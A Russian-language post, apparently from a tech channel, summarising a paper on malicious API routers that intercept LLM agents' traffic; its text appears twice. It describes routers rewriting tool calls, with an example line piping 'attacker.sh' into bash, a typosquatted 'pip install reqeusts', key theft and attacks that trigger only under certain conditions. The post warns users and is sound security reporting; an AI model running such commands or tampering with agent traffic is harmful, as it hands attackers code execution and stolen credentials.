Читаем! Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain
(По мотивам трека Дэвида Гетты)
Большинство LLM-агентов используют API-роутеры (например, LiteLLM, OpenRouter), которые по дизайну являются MITM и видят вообще все: промпты, tool calls, API-ключи, ответы и знают, что ты делал этим летом.
👉 В свежей статье Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain авторы проанализировали 28 платных роутеров и 400 бесплатных и получили следующие результаты: 9 роутеров внедряли вредоносный код, 17 — перехватывали креды (AWS, API keys), а один вообще реально украл ETH!
🤩 Основные атаки
1⃣ Payload injection
Роутер меняет tool call:
# было
curl https://safe.com/install.sh | bash
# стало
curl https://attacker.sh | bash
Агент выполняет и всё, у тебя RCE.
2⃣Secret exfiltration
Вообще ничего не меняется, просто читаются API-ключи, сохраняются и используются позже. Блаженно твое неведение.
3⃣ Dependency hijacking
Самое коварное
pip install requests
↓
pip install reqeusts
Выглядит нормально? А это вредоносный пакет.
4⃣ Conditional attacks
Атака включается только после 50 запросов, только в YOLO mode и только для Rust/Go проектов. А тесты ничего не находят.
Полезно иногда проверять, через какие сервисы реально проходят ваши запросы.
Все
🍔
TL;DR
Если ты используешь LLM-агентов с tool calling:
😭 ты в supply chain
😭 ты доверяешь посредникам
😭 и зря
(По мотивам трека Дэвида Гетты)
Большинство LLM-агентов используют API-роутеры (например, LiteLLM, OpenRouter), которые по дизайну являются MITM и видят вообще все: промпты, tool calls, API-ключи, ответы и знают, что ты делал этим летом.
👉 В свежей статье Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain авторы проанализировали 28 платных роутеров и 400 бесплатных и получили следующие результаты: 9 роутеров внедряли вредоносный код, 17 — перехватывали креды (AWS, API keys), а один вообще реально украл ETH!
🤩 Основные атаки
1⃣ Payload injection
Роутер меняет tool call:
# было
curl https://safe.com/install.sh | bash
# стало
curl https://attacker.sh | bash
Агент выполняет и всё, у тебя RCE.
2⃣Secret exfiltration
Вообще ничего не меняется, просто читаются API-ключи, сохраняются и используются позже. Блаженно твое неведение.
3⃣ Dependency hijacking
Самое коварное
pip install requests
↓
pip install reqeusts
Выглядит нормально? А это вредоносный пакет.
4⃣ Conditional attacks
Атака включается только после 50 запросов, только в YOLO mode и только для Rust/Go проектов. А тесты ничего не находят.
Полезно иногда проверять, через какие сервисы реально проходят ваши запросы.
Все
🍔
TL;DR
Если ты используешь LLM-агентов с tool calling:
😭 ты в supply chain
😭 ты доверяешь посредникам
😭 и зря